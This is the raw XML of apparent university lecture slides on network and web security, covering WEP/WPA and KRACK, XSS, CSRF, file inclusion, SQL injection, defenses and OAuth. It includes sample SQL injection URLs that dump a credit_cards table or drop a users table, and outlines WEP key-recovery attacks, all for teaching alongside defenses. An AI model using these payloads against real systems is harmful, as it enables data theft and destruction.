            <a:ext cx="76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%00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98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92100"/>
            <a:ext cx="88519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8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Another example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>users.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=NULL UNION SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>credit_cards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Result: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM users where id = NULL </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UNION SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>credit_cards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7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another: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>users.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>blah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>;drop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Result:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM users where id = ‘blah’; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>drop table users;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35176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Wireless: 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Used the RC4 PRG instead of a block cipher.  Now known to be insecure: 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> few bytes are non-random. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>40,000 data packets allows to recover the WEP key completely. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If there aren’t that many packets, can capture one ARP packet, send it repeatedly, and force the AP to reply many times. </a:t>
            </a:r>
          </a:p>
          <a:p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use RC4 in a secure manner! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tried a stateless approach, used key as part of the IV.  PRGs are only secure on random input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relied on a linear checksum for authentication. Easily manipulated allowing attack similar to the padding attacks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Caffe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> latte attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Broadcast an AP name, trick the client into connecting.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client authenticates itself, but never asks AP to do the same. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client sends a few encrypted ARP packets. Modify, send back as ARP requests.  Use the responses to recover the WEP key.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315045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Blind SQL injection attack: Even if results aren’t printed on the screen, might learn information based on server errors.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Combine with XSS attack: use SQL injection to put malicious &lt;script&gt; into database.  Later, when a user fetches that row, their browser will execute the script.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8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Developers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use default values: e.g. limit filenames to the small, correct set. Any other filename returns an error. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Admins:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Least privilege for the web server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Patch software.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0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Equifax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blog.talosintelligence.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/2017/03/apache-0-day-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>exploited.htm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OAuth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3265465" y="2643214"/>
            <a:ext cx="911496" cy="7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3135" y="2281546"/>
            <a:ext cx="1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Alice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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90192" y="3773114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57342" y="3410238"/>
            <a:ext cx="98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Prove it.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702508" y="2713005"/>
            <a:ext cx="1144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Client</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000" dirty="0" err="1"/>
              <a:t>C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76961" y="1596420"/>
            <a:ext cx="1317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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200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90192" y="3413327"/>
            <a:ext cx="2693311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18794" y="5914307"/>
            <a:ext cx="1222301" cy="51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42999" y="5544975"/>
            <a:ext cx="107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Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>t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7958" y="3043995"/>
            <a:ext cx="25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Alice, talking to Bob.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="-25000" dirty="0"/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>
          <a:xfrm>
            <a:off x="3265465" y="3004882"/>
            <a:ext cx="911496" cy="766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3135" y="2643214"/>
            <a:ext cx="1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to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>IdP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83378" y="2713005"/>
            <a:ext cx="1144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IdP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err="1" smtClean="0"/>
              <a:t>k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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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47699" y="4222367"/>
            <a:ext cx="2693311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65465" y="3853035"/>
            <a:ext cx="25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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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47699" y="4588197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7254" y="4225321"/>
            <a:ext cx="137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Credential: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3320029" y="5102494"/>
            <a:ext cx="1094430" cy="7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47698" y="4740826"/>
            <a:ext cx="233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Alice: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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02389" y="5544975"/>
            <a:ext cx="124476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18794" y="5175643"/>
            <a:ext cx="311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Bob. </a:t>
            </a:r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endParaRPr lang="en-US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49636" y="6294224"/>
            <a:ext cx="1222301" cy="518"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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32042" y="6292076"/>
            <a:ext cx="362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 to Alice’s profile, using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>t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24302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8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21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>% of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>servers employ SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to protect SSO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sessions. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>[Sun and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Beznosov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, CCS12]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tokens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can be subject to XSS attacks, similarly to cookies. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74799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://www.owasp.org/index.php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Category:OWASP_Top_Ten_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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26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2011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Chrome: 22%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox: 28%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE: 42%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Today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chrome: 64%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox: 14%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE: 9%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8508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Wireless: WPA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WPA Personal: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PSK mode: Shared key, established manually and entered manually at both client and AP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Home use and small LANs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 name (SSID) is used as the salt. Good names help! </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WPA Enterprise (or 802.1x mode):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authentication service handles auth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Methods compatible with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Extensible authentication protocol.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Includes X.509 TLS certificates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WPA2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: update to WPA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requires support for AES encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and MACs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ctr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> mode and CBC-MAC)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44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Reinstallation Attacks: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Forcing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nonce Reuse in WPA2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80781"/>
            <a:ext cx="380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Vanhoef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Piessens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, CCS 2017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5465" y="2643214"/>
            <a:ext cx="26933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93135" y="2281546"/>
            <a:ext cx="1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Alice: ctr1, R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65465" y="3046831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3335" y="2683955"/>
            <a:ext cx="1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Bob: ctr1, R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702508" y="2713005"/>
            <a:ext cx="11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br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>key 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18186" y="2713005"/>
            <a:ext cx="11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key k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65465" y="3483695"/>
            <a:ext cx="2693311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647" y="3611108"/>
            <a:ext cx="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Derive(K, R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, R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  <a:endParaRPr lang="en-US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65465" y="3979465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0360" y="3609615"/>
            <a:ext cx="107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ctr2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28092" y="3609615"/>
            <a:ext cx="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Derive(K, R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, R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3231" y="3114363"/>
            <a:ext cx="25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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(SK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ctr2, SK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38987" y="4495732"/>
            <a:ext cx="26933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56753" y="4126400"/>
            <a:ext cx="361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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(SK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 smtClean="0"/>
              <a:t>ctr3, “The world is ours”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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291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Reinstallation Attacks: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Forcing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nonce Reuse in WPA2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80781"/>
            <a:ext cx="380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Vanhoef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Piessens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, CCS 2017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5465" y="2643214"/>
            <a:ext cx="26933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93135" y="2281546"/>
            <a:ext cx="1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Alice: ctr1, R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65465" y="3046831"/>
            <a:ext cx="26933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3335" y="2683955"/>
            <a:ext cx="1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Bob: ctr1, R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702508" y="2713005"/>
            <a:ext cx="11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br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>key 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18186" y="2713005"/>
            <a:ext cx="11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key k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65465" y="3483695"/>
            <a:ext cx="2693311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647" y="3611108"/>
            <a:ext cx="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Derive(K, R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, R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  <a:endParaRPr lang="en-US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33594" y="3978947"/>
            <a:ext cx="1425182" cy="51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0360" y="3609615"/>
            <a:ext cx="107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ctr2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28092" y="3609615"/>
            <a:ext cx="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Derive(K, R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, R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3231" y="3114363"/>
            <a:ext cx="25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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(SK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ctr2, SK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38987" y="4495732"/>
            <a:ext cx="26933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56753" y="4126400"/>
            <a:ext cx="361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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(SK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 smtClean="0"/>
              <a:t>ctr3, “I said, ‘it’s ours!’ ”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544" y="3643891"/>
            <a:ext cx="556684" cy="6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Web Security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426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Hypertext transfer protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually used to transfer Hypertext markup language (HTML) files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.example.com/directory/file.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can use other protocols with a webserver. E.g. FTP or HTTPS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default port: 80 on webserver.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP request:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>GET /directory/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>						Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP Response: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Headers: 200 OK, Server software, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="3000" dirty="0" smtClean="0"/>
              <a:t>…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					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> body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83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1967</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>263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ISA 562</vt:lpstr>
      <vt:lpstr>Honeypots</vt:lpstr>
      <vt:lpstr>Wireless</vt:lpstr>
      <vt:lpstr>Wireless: WEP</vt:lpstr>
      <vt:lpstr>Wireless: WPA</vt:lpstr>
      <vt:lpstr>Key Reinstallation Attacks:  Forcing Nonce Reuse in WPA2</vt:lpstr>
      <vt:lpstr>Key Reinstallation Attacks:  Forcing Nonce Reuse in WPA2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>HTML Forms</vt:lpstr>
      <vt:lpstr>HTTPS</vt:lpstr>
      <vt:lpstr>Dynamic Content</vt:lpstr>
      <vt:lpstr>Javascript</vt:lpstr>
      <vt:lpstr>Session Information</vt:lpstr>
      <vt:lpstr>Session Information</vt:lpstr>
      <vt:lpstr>Session Information</vt:lpstr>
      <vt:lpstr>Session Information</vt:lpstr>
      <vt:lpstr>Session Information</vt:lpstr>
      <vt:lpstr>Attacks on Clients</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Click-Jacking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS Defense</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Attacks on Servers</vt:lpstr>
      <vt:lpstr>Remote File Inclusion</vt:lpstr>
      <vt:lpstr>Local-File Inclusion</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Defenses</vt:lpstr>
      <vt:lpstr>Equifax</vt:lpstr>
      <vt:lpstr>OAuth</vt:lpstr>
      <vt:lpstr>OAuth</vt:lpstr>
      <vt:lpstr>OWASP</vt:lpstr>
      <vt:lpstr>Browser market share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 562</dc:title>
  <dc:creator>Dov</dc:creator>
  <cp:lastModifiedBy>Dov</cp:lastModifiedBy>
  <cp:revision>291</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-28T21:43:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-24T20:08:14Z</dcterms:modified>
</cp:coreProperties>
</file>